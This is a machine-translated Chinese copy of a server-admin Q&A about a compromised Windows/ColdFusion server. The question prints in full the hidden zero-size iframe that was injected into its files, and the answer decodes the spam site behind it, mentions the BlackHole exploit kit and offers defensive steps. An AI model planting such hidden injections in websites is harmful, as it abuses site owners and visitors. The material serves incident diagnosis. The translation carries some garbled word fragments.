服务器 Gind.cn
  1. 服务器 Gind.cn
  3. 代码注入,某种黑客?
Intereting Posts
Postfixselect性header_checks:smtpd_relay_restrictions与smtpd_recipient_restrictions 并发会话和IPsec / VPN会话有什么区别? 每用户umask通过所有的SSH连接 使用Windows更新Win2008R2 SP1安装多个更新时,更新通常会失败,但一次只能安装一次失败的更新 使用VPS作为前端代理 从系统到虚拟用户的Dovecot / sendmail迁移 在CUPS中打印报告 用户使用PHP上传不同服务器上的文件? 我是否需要在Mac上重新安装PHP以获取新安装的function? 什么是iperf3的默认TCP窗口大小? SQL Server 2008 express r2 如何通过脚本或通过自动化closuresWindows 7防火墙? 使用HTTP请求更新Google Cloud DNSlogging的简单方法 将域名指向静态IP 允许使用IPTables的FTP

代码注入,某种黑客?

东西似乎有黑客入侵的networking服务器,或者我们有一些半恶意代码运行,不断注入代码到我们的网站。 它似乎只影响一些ColdFusion和HTML文件。 我们已经运行了malwarebytes,spybot和AVG antivirus,并删除了他们find的任何条目,尽pipe数量并不多。 我正在研究和安装一些入侵检测软件(如Snort或OSSEC),看看这是否会帮助我find罪魁祸首,但我想知道如果有人曾经见过这样的事情,或知道恶意代码可以躲了起来。

它似乎注入了以下代码: 

<iframe scrolling="no" frameborder="0" src="http://www.collegefun4u.com/" width="0" height="0"></iframe>

每天晚上,在完全随机的时间,把它们分成几个文件。

这是在运行Coldfusion MX7的Windows 2003服务器上。 这些文件被更改时,日志/事件查看器中不会显示任何内容。

首先要做的就是立即检查一下collegefun4u的全部内容。

以安全的方式请求站点并解开JS代码, 我们得到 : 

 www.collegefun4u.com/ benign [nothing detected] www.collegefun4u.com/ status: (referer=http:/twitter.com/trends/) saved 1205 bytes 3667a08e039642842c11744f464163baa186e4da info: [decodingLevel=0] found JavaScript error: undefined variable s info: [1] no JavaScript file: 3667a08e039642842c11744f464163baa186e4da: 1205 bytes file: f9e4048e7e87436e12343dbcd9d467a31f0c972e: 93 bytes Decoded Files 3667/a08e039642842c11744f464163baa186e4da from www.collegefun4u.com/ (1205 bytes, 17 hidden) <html> <head> <title>Top 3 Webhosting</title> <meta content="text/html; charset=iso-8859-1" http-equiv='Content-Type'> <body> <script> </script> <table border='0' cellspacing='0' cellpadding='0' width='960' height="100%"> <tbody> <tr> <td> <a target="_self" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574678674&toolid=10001&campid=5335950793&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg">Shopping In Ebay For The Cheapest</a> </td> <td> <a href="http://stats.justhost.com/track?c998ec72c307330822d1608c2d6651a1f">JustHost</a> </td> <td> <a href="http://secure.hostgator.com/~affiliat/cgi-bin/affiliates/clickthru.cgi?id=hydmedia-">Hostgator</a> </td> </tr> </tbody> </table> </body> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-33569939-1']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </html> f9e4/048e7e87436e12343dbcd9d467a31f0c972e from www.collegefun4u.com/ (93 bytes) //jsunpack.called CreateElement script //jsunpack.url http://www.google-analytics.com/ga.js

请注意,我美化了HTML,以便于阅读。

正如你所看到的,它至less不会试图以任何方式伤害你的用户,只是插入一些WebHosting(从标题中了解到)垃圾邮件,三个链接在一个表中,跨越整个屏幕。 还应该注意的是,他们正在通过Google Analytics分析您的stream量。

在互联网上进一步发现,我发现了一个类似的问题,似乎与你有同样的问题。 稍后在collegefun4u网站上加载对他的页面的请求。 URL Query非常聪明,告诉我们它检测到BlackHole漏洞利用工具包的HTTP GET请求

确切地说,BlackHole漏洞利用套件近来在服务器上调整文件而声名鹊起。 他们只是在各种types的服务器软件中使用零日漏洞,以便能够调整文件以能够垃圾邮件或感染许多客户端。

这里故事的底线是三重:

  1. 跟踪您的服务器及其软件的版本,并确保一切都是更新的,这从Apache / IIS到Plesk到您的框架PHPMyAdmin和更远。

  2. 确保你configuration了任何面向互联网不能写入到你的磁盘,这主要意味着configurationPlesk / PHP /文件权限。

  3. 如果它继续发生,请确保您logging文件访问,以便您知道哪个进程正在执行此操作。 在Windows上,您有Process Monitor ,请将其设置为过滤.html和/或.js文件,这样您就不会在所有访问中填充页面文件。 这可能会学到更多…